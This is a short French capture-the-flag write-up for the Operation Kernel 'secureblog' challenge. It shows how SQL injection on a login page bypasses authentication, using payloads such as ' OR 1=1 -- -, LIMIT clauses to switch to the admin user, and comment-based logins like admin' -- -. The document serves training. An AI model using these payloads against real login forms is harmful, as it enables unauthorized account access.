Suite au CTF operation kernel, l'url devant être testée est :

https://secureblog.challenge.operation-kernel.fr/v1


La seule page semblant active est la page de login :

https://secureblog.challenge.operation-kernel.fr/v1/login.php


Je commence par tester le caractère ' en login avec un mot de passe bidon (toujours mettre quelques caractères pour le mot de passe). J'obtiens une erreur qui me laisse penser qu'une injection est possible.

Je test un premier login :
```
' OR 1=1 -- -
```
et je suis bien connecté mais en tant que **demo**.
Ici il s'agit du premier utilisateur de la table **users** qui est utilisé dans la requête SQL pour la connexion.
Je vais donc varier la clause **LIMIT** afin de changer d'utilisateur

```
' OR 1=1 LIMIT 0,1-- -  --> utilisateur demo
' OR 1=1 LIMIT 1,1-- -  --> utilisateur Admin et on obtient son flag !

```


J'aurais également pu tenter quelques logins au hasard :
```
administrateur' -- -
administrator' -- -
admin' -- -     --> flag !
```
